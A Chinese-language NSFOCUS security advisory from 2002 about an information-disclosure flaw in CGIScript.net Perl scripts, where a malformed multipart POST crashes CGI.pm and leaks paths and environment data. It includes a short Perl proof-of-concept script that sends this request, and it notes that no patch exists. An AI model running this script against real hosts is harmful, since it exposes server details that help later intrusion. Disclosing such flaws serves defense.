首页 -> 安全研究

安全研究

安全漏洞
CGIScript.net信息泄露漏洞

发布日期:2002-05-17
更新日期:2002-05-21

受影响系统:
CGISCRIPT.NET csMailto
CGISCRIPT.NET csBanner 1.0
CGISCRIPT.NET csCreatePro 1.0
CGISCRIPT.NET csDownload 1.0
CGISCRIPT.NET csFAQ 1.0
CGISCRIPT.NET csFilter 1.0
CGISCRIPT.NET csFileshare 1.0
CGISCRIPT.NET csGrid 1.0
CGISCRIPT.NET csIncludes 1.0
CGISCRIPT.NET csNews Professional 1.0
CGISCRIPT.NET csNews 1.0
CGISCRIPT.NET csRandomText 1.0
CGISCRIPT.NET csUpload 1.0
描述:
BUGTRAQ  ID: 4764

CGIScript.net提供各种WEB管理员相关的工具,由Mike Barone和Andy Angrick维护。

CGIScript.net中的多个脚本存在漏洞,可以导致远程攻击者获得脚本相关的各种敏感信息。

由于多个脚本使用CGI.pm来处理文件上载,攻击者可以提交畸形不正常的POST请求导致CGI.pm崩溃而获得脚本相关的路径、表单输入和环境变量等信息。

这些信息可以帮助攻击者进一步对主机进行攻击。

下面所示14个CGI脚本存在此漏洞:

csBanner.cgi
csCreatePro.cgi
CSDownload.cgi
csFAQ.cgi
CSFiler.cgi
CSFileshare.cgi
CSGrid.cgi
CSIncludes.cgi
CSMailto.cgi
CSNews.cgi
CSNews.cgi (csNewsPro - same filename)
CSPassword.cgi
CSRandomText.cgi
CSUpload.cgi

<*来源:Steve Gustin (stegus1@yahoo.com
  
  链接:http://archives.neohapsis.com/archives/bugtraq/2002-05/0152.html
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Steve Gustin (stegus1@yahoo.com)提供了如下测试方法:

#!/usr/bin/perl
# show_debug_data.pl
# make cgiscript.net scripts dump debug data


use strict;
use IO::Socket::Inet;


my $host = 'hostname.com';
my $path = '/cgi-script/CSMailto/CSMailto.cgi';


my $sock = IO::Socket::INET->new("$host:80");
print $sock "POST $path\n";
print $sock "Content-type: multipart/form-data;";
print $sock " boundary=--\n\n";
print <$sock>;
close($sock);

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 暂时没有合适的临时解决方法。

厂商补丁:

CGISCRIPT.NET
-------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.cgiscript.net

浏览次数:2886
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障